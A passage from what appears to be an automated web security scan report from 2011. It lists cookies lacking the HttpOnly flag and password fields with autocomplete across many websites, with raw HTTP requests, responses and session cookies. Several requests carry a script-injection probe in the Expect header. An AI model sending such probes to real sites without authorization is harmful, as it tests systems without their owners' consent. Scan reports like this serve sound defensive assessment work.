Date: Mon, 02 May 2011 02:32:48 GMT
Server: Apache
Set-Cookie: CAKEPHP=p84gesk7v1bk0c3dmkbop21ss0; expires=Mon, 09-May-2011 02:32:49 GMT; path=/quotient
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=p84gesk7v1bk0c3dmkbop21ss0; expires=Mon, 09-May-2011 02:32:49 GMT; path=/quotient
Set-Cookie: CAKEPHP=p84gesk7v1bk0c3dmkbop21ss0; expires=Mon, 09-May-2011 02:32:49 GMT; path=/quotient
Set-Cookie: CAKEPHP=p84gesk7v1bk0c3dmkbop21ss0; expires=Mon, 09-May-2011 02:32:49 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 14232

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...

17.164. http://www.seoq.com/web/img/bg-seo-quotient-tool-button.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /web/img/bg-seo-quotient-tool-button.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /web/img/bg-seo-quotient-tool-button.jpg HTTP/1.1
Host: www.seoq.com
Proxy-Connection: keep-alive
Referer: http://www.seoq.com/quotient/analysis/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=84ovc21s3vtovhoj4kq864i715; __utmz=98813212.1304319916.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=98813212.996978159.1304319916.1304319916.1304319916.1; __utmc=98813212; __utmb=98813212.1.10.1304319916

Response

HTTP/1.0 404 Not Found
Date: Mon, 02 May 2011 02:33:48 GMT
Server: Apache
Set-Cookie: CAKEPHP=sj9juf9refplohbur110cihta7; expires=Thu, 01-May-2036 08:33:49 GMT; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 7911
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta http-equiv="Content-Type" con
...[SNIP]...

17.165. http://www.serengeticatalog.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.serengeticatalog.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.serengeticatalog.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Sun, 01 May 2011 23:55:53 GMT
Content-Length: 0
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: balance=K7D4lUZpgAHaiH3AJvHKqcVFSE/sycOmNPJ30zrDFARriwF8Eb4u7i6w6vu2k7P062AwJjcEcq5Yhw==; path=/


17.166. http://www.sportsmanswarehouse.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sportsmanswarehouse.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sportsmanswarehouse.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: Web Server 1.0
Date: Sun, 01 May 2011 23:47:24 GMT
Set-Cookie: NSC_tqpsutnbot_qspe_mc=ffffffff09c9382a45525d5f4f58455e445a4a4229a0;path=/
Content-Length: 0


17.167. http://www.tellusaboutus.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tellusaboutus.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tellusaboutus.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Length: 0
Server: Microsoft-IIS/6.0
IISExport: This web site was exported using IIS Export v3.0
IISExport: This web site was exported using IIS Export v4.1
IISExport: This web site was exported using IIS Export v4.1
IISExport: This web site was exported using IIS Export v4.2
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:11:38 GMT
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=c604a8c000005000; Path=/; Max-age=3600


17.168. http://www.trashedgirlfriends.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.trashedgirlfriends.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.trashedgirlfriends.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Sun, 01 May 2011 23:44:53 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: RNLBSERVERID=ded377; path=/
Content-Length: 378

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>417 Expectation Failed</TITLE>
</HEAD><BODY>
<H1>Expectation Failed</H1>
The expectation given in the Expect request-header
field
...[SNIP]...

17.169. http://www.usahockey.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usahockey.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.usahockey.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:18:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: BALANCEID=mycluster.node3; path=/;
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=adr1k555psq425yrmsw0pzuo; path=/; HttpOnly
Set-Cookie: HockeyType=ICE; expires=Wed, 02-May-2012 00:18:30 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 5252


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script src="/Ja
...[SNIP]...

17.170. http://www.usjobsources.com/MjMwODJ8NzA2N3wxMjYwNjY3fHYy/r

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usjobsources.com
Path:   /MjMwODJ8NzA2N3wxMjYwNjY3fHYy/r

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /MjMwODJ8NzA2N3wxMjYwNjY3fHYy/r?p=7067&t=2&a=31s-2100u&c1=vulnerability%20management HTTP/1.1
Host: www.usjobsources.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Set-Cookie: ServerID=1034; path=/; expires=Tue, 03-May-2011 04:18:25 GMT
Date: Sun, 01 May 2011 23:32:52 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: RSNAME=b-adnfews03; expires=Mon, 02-May-2011 23:32:52 GMT; path=/; domain=www.usjobsources.com
Set-Cookie: LOGIN_TRACKERMjMwODJ8NzA2N3wxMjYwNjY3fHYy=NzA2Ny0yMzA4Mi0xMjYwNjY3LTMxcy0yMTAwdS0%3D%7Cwvh5glat; expires=Mon, 02-May-2011 23:32:52 GMT; path=/; domain=www.usjobsources.com
P3P: CP="IDC DSP COR CURa ADMa DEVa PSAa PSDa CONi TELi OUR DELa BUS IND PHY UNI PUR COM NAV INT DEM", CP="IDC DSP COR CURa ADMa DEVa PSAa PSDa CONi TELi OUR DELa BUS IND PHY UNI PUR COM NAV INT DEM"
Set-Cookie: REDIRECT_TRACKER23082=wvh5glat; expires=Mon, 02-May-2011 23:32:53 GMT; path=/; domain=www.usjobsources.com
Set-Cookie: MULTI_REDIRECT_TRACKER230821725572573=MTIzMg%3D%3D; expires=Mon, 02-May-2011 23:32:53 GMT; path=/; domain=www.usjobsources.com
Location: http://usjobsresource.com/3?s=31s-2100u
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


18. Password field with autocomplete enabled
There are 14 instances of this issue:


18.1. http://insurancenewsnet.com/article.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   http://insurancenewsnet.com
Path:   /article.aspx

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /article.aspx?id=257992 HTTP/1.1
Host: insurancenewsnet.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=600
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=1k3l4a55gy1fk4jf5xabtr45; path=/; HttpOnly
Set-Cookie: INNid=1k3l4a55gy1fk4jf5xabtr45; expires=Tue, 01-May-2012 23:33:25 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:33:25 GMT
Content-Length: 74743


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   Insur
...[SNIP]...
<!-- end Tooltips -->
<form name="aspnetForm" method="post" action="article.aspx?id=257992" id="aspnetForm">
<div>
...[SNIP]...
<p style="padding:0px 5px; margin-bottom:0;">Password: <input name="ctl00$Template_navigation$txtLoginPassword" type="password" id="ctl00_Template_navigation_txtLoginPassword" onkeydown="if(event.which || event.keyCode){if ((event.which == 13) || (event.keyCode == 13)) {__doPostBack('ctl00$Template_navigation$btnLoginUser', '');return false;}} else {return true}; " style="width:115px;" /></p>
...[SNIP]...

18.2. https://www.crankyape.com/default.asp

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.crankyape.com
Path:   /default.asp

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /default.asp?pg=DispSingleItem&ItemNumber=26361 HTTP/1.1
Host: www.crankyape.com
Connection: keep-alive
Referer: http://www.crankyape.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=29347566.1415346539.1304319195.1304319195.1304319195.1; __utmb=29347566; __utmc=29347566; __utmz=29347566.1304319195.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/5|utmcmd=referral; ASPSESSIONIDSARCDQAB=LKADMMGCJFEGEIFCGJNABOCD

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Mon, 02 May 2011 01:53:37 GMT
Content-Type: text/html
Expires: Sun, 01 May 2011 01:53:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 30879

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>
<title>Crankyape.com Insurance total loss rvs, motorcycles, atvs, snowmobiles, boats, trucks, trailers.
...[SNIP]...
<hr width="645" size="1">
   
<FORM name="BidOnItem26361" onsubmit="return ValidateFields(this)" action="default.asp" ID="Form1">
<input type="hidden" name="pg" value="ProcBid" ID="Hidden1">
...[SNIP]...
<td><input type="password" name="PASSWORD" size="25"></td>
...[SNIP]...

18.3. https://www.crankyape.com/member/

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.crankyape.com
Path:   /member/

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /member/ HTTP/1.1
Host: www.crankyape.com
Connection: keep-alive
Referer: https://www.crankyape.com/default.asp?pg=DispSingleItem&ItemNumber=26361
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=29347566.1415346539.1304319195.1304319195.1304319195.1; __utmb=29347566; __utmc=29347566; __utmz=29347566.1304319195.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/5|utmcmd=referral; ASPSESSIONIDSARCDQAB=LKADMMGCJFEGEIFCGJNABOCD; ASP.NET_SessionId=wcvayn45psp4cd3wlkyqwt45

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 02 May 2011 02:10:51 GMT
Content-Length: 6535
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html xmlns=
...[SNIP]...
<body>
<form name="form1" method="post" action="Default.aspx" id="form1">
<div>
...[SNIP]...
<td>
<input name="txtPassword" type="password" id="txtPassword" />
</td>
...[SNIP]...

18.4. https://www.crankyape.com/member/registration.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.crankyape.com
Path:   /member/registration.aspx

Issue detail

The page contains a form with the following action URL:
The form contains the following password fields with autocomplete enabled:

Request

GET /member/registration.aspx HTTP/1.1
Host: www.crankyape.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=29347566.1415346539.1304319195.1304319195.1304319195.1; __utmb=29347566; __utmc=29347566; __utmz=29347566.1304319195.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/5|utmcmd=referral; ASPSESSIONIDSARCDQAB=LKADMMGCJFEGEIFCGJNABOCD

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 02 May 2011 01:53:57 GMT
Content-Length: 73292
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=udtimieu5ipjefqiu2icmf45; path=/; HttpOnly


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   CrankyApe.c
...[SNIP]...
<body>
<form name="aspnetForm" method="post" action="registration.aspx" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div>
...[SNIP]...
<td align="left">
<input name="ctl00$cphMainContent$txtMemPass1" type="password" maxlength="30" size="30" id="ctl00_cphMainContent_txtMemPass1" class="reqField" />
</td>
...[SNIP]...
<td align="left"><input name="ctl00$cphMainContent$txtMemPass2" type="password" maxlength="30" size="30" id="ctl00_cphMainContent_txtMemPass2" class="reqField" /></td>
...[SNIP]...

18.5. http://www.greenhulk.net/forums/login.php

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.greenhulk.net
Path:   /forums/login.php

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

POST /forums/login.php?do=login HTTP/1.1
Host: www.greenhulk.net
Proxy-Connection: keep-alive
Referer: http://www.greenhulk.net/forums/register.php
Cache-Control: max-age=0
Origin: http://www.greenhulk.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gh_sessionhash=95336a5715caddfe645c46b8976e18eb; gh_lastvisit=1304301796; __utmz=109700179.1304319910.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gh_lastactivity=0; __utma=109700179.1539471416.1304319910.1304319910.1304319910.1; __utmc=109700179; __utmb=109700179.2.10.1304319910
Content-Length: 222

vb_login_username=User+Name&vb_login_password_hint=Password&vb_login_password=&s=&securitytoken=guest&do=login&vb_login_md5password=d41d8cd98f00b204e9800998ecf8427e&vb_login_md5password_utf=d41d8cd98f
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:30:42 GMT
Server: Apache
Set-Cookie: gh_lastvisit=1304301796; expires=Tue, 01-May-2012 02:30:42 GMT; path=/; domain=.greenhulk.net
Set-Cookie: gh_lastactivity=0; expires=Tue, 01-May-2012 02:30:42 GMT; path=/; domain=.greenhulk.net
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Expires: Mon, 02 May 2011 02:30:42 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 27862

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en" id="vbulletin_
...[SNIP]...
</script>
           <form id="navbar_loginform" action="login.php?do=login" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
               <fieldset id="logindetails" class="logindetails">
...[SNIP]...
<input type="text" class="textbox default-value" tabindex="102" name="vb_login_password_hint" id="navbar_password_hint" size="10" value="Password" style="display:none;" />
                   <input type="password" class="textbox" tabindex="102" name="vb_login_password" id="navbar_password" size="10" />
                   <input type="submit" class="loginbutton" tabindex="104" value="Log in" title="Enter your username and password in the boxes provided to login, or click the 'register' button to create a profile
...[SNIP]...

18.6. http://www.greenhulk.net/forums/login.php

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.greenhulk.net
Path:   /forums/login.php

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

POST /forums/login.php?do=login HTTP/1.1
Host: www.greenhulk.net
Proxy-Connection: keep-alive
Referer: http://www.greenhulk.net/forums/register.php
Cache-Control: max-age=0
Origin: http://www.greenhulk.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gh_sessionhash=95336a5715caddfe645c46b8976e18eb; gh_lastvisit=1304301796; __utmz=109700179.1304319910.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gh_lastactivity=0; __utma=109700179.1539471416.1304319910.1304319910.1304319910.1; __utmc=109700179; __utmb=109700179.2.10.1304319910
Content-Length: 222

vb_login_username=User+Name&vb_login_password_hint=Password&vb_login_password=&s=&securitytoken=guest&do=login&vb_login_md5password=d41d8cd98f00b204e9800998ecf8427e&vb_login_md5password_utf=d41d8cd98f
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:30:42 GMT
Server: Apache
Set-Cookie: gh_lastvisit=1304301796; expires=Tue, 01-May-2012 02:30:42 GMT; path=/; domain=.greenhulk.net
Set-Cookie: gh_lastactivity=0; expires=Tue, 01-May-2012 02:30:42 GMT; path=/; domain=.greenhulk.net
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Expires: Mon, 02 May 2011 02:30:42 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 27862

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en" id="vbulletin_
...[SNIP]...
</h2>
   
       <form class="block vbform" method="post" action="login.php?do=login" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">    
           <input type="hidden" name="do" value="login" />
...[SNIP]...
</label>
                       <input type="password" class="primary textbox" id="vb_login_password" name="vb_login_password" tabindex="1" />
                   </div>
...[SNIP]...

18.7. http://www.greenhulk.net/forums/register.php

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.greenhulk.net
Path:   /forums/register.php

Issue detail

The page contains a form with the following action URL:
The form contains the following password fields with autocomplete enabled:

Request

GET /forums/register.php HTTP/1.1
Host: www.greenhulk.net
Proxy-Connection: keep-alive
Referer: http://www.greenhulk.net/forums/showthread.php?126285-Rear-boarding-step
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gh_sessionhash=95336a5715caddfe645c46b8976e18eb; gh_lastvisit=1304301796; gh_lastactivity=0; __utmz=109700179.1304319910.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=109700179.1539471416.1304319910.1304319910.1304319910.1; __utmc=109700179; __utmb=109700179.1.10.1304319910

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:28:52 GMT
Server: Apache
Set-Cookie: gh_lastvisit=1304301796; expires=Tue, 01-May-2012 02:28:52 GMT; path=/; domain=.greenhulk.net
Set-Cookie: gh_lastactivity=0; expires=Tue, 01-May-2012 02:28:52 GMT; path=/; domain=.greenhulk.net
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Expires: Mon, 02 May 2011 02:28:52 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 35808

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
   <me
...[SNIP]...
</script>

<form id="registerform" action="register.php?do=addmember" name="register" method="post" onsubmit="return verify_passwords(password, passwordconfirm);" class="vbform block">

   
   <h2 class="blockhead">
...[SNIP]...
</label>
                       <input type="password" class="textbox" name="password" id="password" maxlength="50" value="" tabindex="1" />
                   </li>
...[SNIP]...
</label>
                       <input type="password" class="textbox" name="passwordconfirm" id="passwordconfirm" maxlength="50" value="" tabindex="1" />
                   </li>
...[SNIP]...

18.8. http://www.greenhulk.net/forums/register.php

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.greenhulk.net
Path:   /forums/register.php

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /forums/register.php HTTP/1.1
Host: www.greenhulk.net
Proxy-Connection: keep-alive
Referer: http://www.greenhulk.net/forums/showthread.php?126285-Rear-boarding-step
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gh_sessionhash=95336a5715caddfe645c46b8976e18eb; gh_lastvisit=1304301796; gh_lastactivity=0; __utmz=109700179.1304319910.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=109700179.1539471416.1304319910.1304319910.1304319910.1; __utmc=109700179; __utmb=109700179.1.10.1304319910

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:28:52 GMT
Server: Apache
Set-Cookie: gh_lastvisit=1304301796; expires=Tue, 01-May-2012 02:28:52 GMT; path=/; domain=.greenhulk.net
Set-Cookie: gh_lastactivity=0; expires=Tue, 01-May-2012 02:28:52 GMT; path=/; domain=.greenhulk.net
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Expires: Mon, 02 May 2011 02:28:52 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 35808

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
   <me
...[SNIP]...
</script>
           <form id="navbar_loginform" action="login.php?do=login" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
               <fieldset id="logindetails" class="logindetails">
...[SNIP]...
<input type="text" class="textbox default-value" tabindex="102" name="vb_login_password_hint" id="navbar_password_hint" size="10" value="Password" style="display:none;" />
                   <input type="password" class="textbox" tabindex="102" name="vb_login_password" id="navbar_password" size="10" />
                   <input type="submit" class="loginbutton" tabindex="104" value="Log in" title="Enter your username and password in the boxes provided to login, or click the 'register' button to create a profile
...[SNIP]...

18.9. http://www.greenhulk.net/forums/showthread.php

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.greenhulk.net
Path:   /forums/showthread.php

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /forums/showthread.php?126285-Rear-boarding-step HTTP/1.1
Host: www.greenhulk.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gh_sessionhash=95336a5715caddfe645c46b8976e18eb; gh_lastvisit=1304301796; gh_lastactivity=0

Response

HTTP/1.1 200 OK
